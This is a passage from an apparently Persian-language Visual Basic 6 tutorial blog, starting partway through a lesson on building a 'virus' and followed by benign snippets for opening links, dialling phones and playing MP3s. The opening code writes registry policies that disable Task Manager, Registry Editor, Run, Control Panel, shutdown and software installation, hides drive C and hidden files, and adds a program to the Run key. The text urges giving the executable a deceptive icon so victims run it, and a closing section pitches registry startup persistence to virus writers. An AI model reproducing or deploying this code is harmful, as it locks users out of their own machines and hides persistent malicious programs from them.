Call SaveString(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, `DisableRegistryTools`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableTaskManager()
Call SaveString(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, `DisableTaskMgr`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableDisplayProperties()
Call SaveString(HKEY_CURRENT_USER, `SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem`, `NoDispCPL`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableShutdown()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionpoliciesExplorer`, `NoClose`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableSearch()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoFind`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableMyComputerProperties()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoPropertiesMyComputer`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableRun()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoRun`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableAllPrograms()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoStartMenuMorePrograms`, 1, REG_DWORD, 4)
End Sub

Private Sub HideDrive_C()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoDrives`, 4, REG_DWORD, 4)
End Sub

Private Sub DisableControlPanel()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoControlPanel`, 1, REG_DWORD, 4)
End Sub

Private Sub DisableFolderOption()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer`, `NoFolderOptions`, 1, REG_DWORD, 4)
End Sub

Private Sub DontShowHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenNOHIDDEN`, `CheckedValue`, 2, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL`, `CheckedValue`, 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, `SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced`, `Hidden`, 0, REG_DWORD, 4)
End Sub

Private Sub DontShowSuperHiddenFiles()
Call SaveString(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden`, `CheckedValue`, 0, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden`, `UncheckedValue`, 0, REG_DWORD, 4)
Call SaveString(HKEY_CURRENT_USER, `SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced`, `SuperHidden`, 0, REG_DWORD, 4)
End Sub

Private Sub DisableAddRemove()
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoAddRemovePrograms`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoAddFromCDorFloppy`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoAddFromInternet`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoAddFromNetwork`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoAddPage`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoRemovePage`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoServices`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoSetFolders`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoSupportInfo`, 1, REG_DWORD, 4)
Call SaveString(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall`, `NoWindowsSetupPage`, 1, REG_DWORD, 4)
End Sub

Private Sub ChangeNameAndCompanyName()
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, `SOFTWAREMicrosoftWindows NTCurrentVersion`, keyhand)
r = RegSetValueEx(keyhand, `RegisteredOwner`, 0, REG_SZ, ByVal `Amir Amiri`, Len(`Amir Amiri`))
r = RegSetValueEx(keyhand, `RegisteredOrganization`, 0, REG_SZ, ByVal `Http://V-Basic.Mihanblog.Com`, Len(`Http://V-Basic.Mihanblog.Com`))
r = RegCloseKey(keyhand)
End Sub

Public Sub AddToRun(ProgramName As String, FileToRun As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(HKEY_LOCAL_MACHINE, `SoftwareMicrosoftWindowsCurrentVersionRun`, keyhand)
r = RegSetValueEx(keyhand, ProgramName, 0, REG_SZ, ByVal FileToRun, Len(FileToRun))
r = RegCloseKey(keyhand)
End Sub


برنامه رو ذخیره کنید و ازش یه فایل .exe بسازید و اجراش کنید تا بیچاره بشید. سعی کنید برای ویروستون یک آیکون گول زننده و جذاب بذارید تا کاربر به محض مشاهده حس کنجکاویش کار دستش بده. تا اینجا تونستید یک ویروس بسازید ولی اگر اجراش کنید وقعاً بیچاره میشید پس دست نگه دارید. هر ویروسی باید یک آنتی ویروس داشته باشه و چون ویروس ما به شدت آزار دهنده و کمی هم مخربه پس باید آنتی ویروسشو در کنارش داشته باشید. ویروس ما محدودیت هایی رو به کاربر اعامل میکنه که شما میدونید اون محمدودیت ها چی هستن و چه طور اعمال شدن پس میتونید به راحتی اونا رو خنثی کنید. موفق باشید.

..............................................................arrowarrow.......................................arrow
توابع API





ساخت Link برای سایت یا وبلاگ (درخواستی)


یک پروژه جدید باز کنید و توش یک Label بزارید و کدهای زیر رو تو قسمت جنرال فرمتون کپی کنید :


Private Declare Function ShellExecute Lib `shell32.dll` Alias `ShellExecuteA` (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Sub Form_Load()
Label1.Caption = `www.v-basic.mihanblog.com`
End Sub

Private Sub Label1_Click()
Link Label1.Caption
End Sub

Public Function Link(ByVal URL As String) As Long
Link = ShellExecute(0&, vbNullString, URL, vbNullString, vbNullString, vbNormalFocus)
End Function

اینو طبق درخواست یکی از دوستان که در قسمت نظرات درخواست کرده بود گذاشتم، موفق باشید.





امکان شماره گیری تلفن با برنامه شما


اینکار خیلی آسونه. یک پروژه جدید باز کنید و تو فرمتون یک Command Button و یک TextBox بذارید و کد زیر رو تو قسمت جنرال فرمتون کپی کنید :


Private Declare Function tapiRequestMakeCall Lib `TAPI32.DLL` (ByVal Dest As String, ByVal AppName As String, ByVal CalledParty As String, ByVal Comment As String) As Long

Private Sub Command1_Click()
tapiRequestMakeCall Text1.Text, ``, ``, ``
End Sub




حالا برنامه رو اجرا کنید و تو TextBox شماره تلفن رو وارد کنید و کلید Command1 رو بزنید، میبینید که شماره گیری توسط خود ویندوز انجام میشه و احتیاجی نیست که شما کاری انجام بدید. موفق باشید.





پخش فایلهای MP3 از درون برنامه شما (کد اصلی)


اصل کدش رو از یه جایی کش رفتم و برای شما عزیزان گذاشتم تا نظرای خوب خوب بدید.


یک پروژه جدید باز کنید و تو فرمتون یک TextBox و دو تا Command Button بزارید بعد از Command Button اول یک کپی بگیرید و Paste کنید تا آرایه ساخته بشه و بعد کد زیر رو تو قسمت جنرال فرمتون کپی کنید و برنامه رو اجرا کنید :


Private Declare Function mciSendString Lib `winmm.dll` Alias `mciSendStringA` (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long

Dim isPlaying As Boolean
Dim Mp3File As String

Private Sub Command1_Click(Index As Integer)
Mp3File = Chr$(34) + Trim(Text1.Text) + Chr$(34)
Select Case Index
Case 0
mciSendString `open ` + Mp3File, 0&, 0&, 0&
mciSendString `play ` + Mp3File, ``, 0&, 0&
isPlaying = True
Case 1
mciSendString `close ` + Mp3File, 0&, 0&, 0&
isPlaying = False
End Select
End Sub

Private Sub Command2_Click()
Unload Me
End Sub

Private Sub Form_Load()
Command1(0).Caption = `Start`
Command1(1).Caption = `Stop`
Command2.Caption = `Exit`
End Sub

Private Sub Form_Unload(Cancel As Integer)
If isPlaying = True Then
mciSendString `close ` + Mp3File, 0&, 0&, 0&
End If
End Sub




حالا تو TextBox آدرس یک فایل MP3 رو وارد کنید و دکمه Start رو بزنید، موسیقی پخش میشه، به همین سادگی. لازم به ذکره که این کد بارها و بارها تست شده و هیچ گونه مشکلی نداره اگر کسی به مشکلی برخورد در قسمت نظرات مطرح کنه. موفق باشید.





قرار دادن برنامه در Startup


برای اینکار دو روش وجود داره؛ روش اول اینه که برنامه رو در پوشه Startup کپی کنیم که روش جالبی نیستچون کاربر میتونه به اون پوشه به و فایل رو پاک کنه و امّا روش دوّم (قابل توجّه ویروس نویسا) اینه که برنامه رو تو لیست برنامه های Startup در رجیستری ذخیره کنیم که روش مطمئن و بهتریه چون کاربر نمیدونه برنامه کجا قرار داره و از کجا اجرا میشه مگر اینکه از طریق رجیستری و یا برنامه System Configuration Utility (تایپ msconfig در Run ویندوز) متوجه مسیر برنامه بشه که خب خوشبختانه همه اینکارو بلد نیستن.


به ترتیب روش اول و بعد روش دوّم رو آموزش م

  امتیاز: 0.00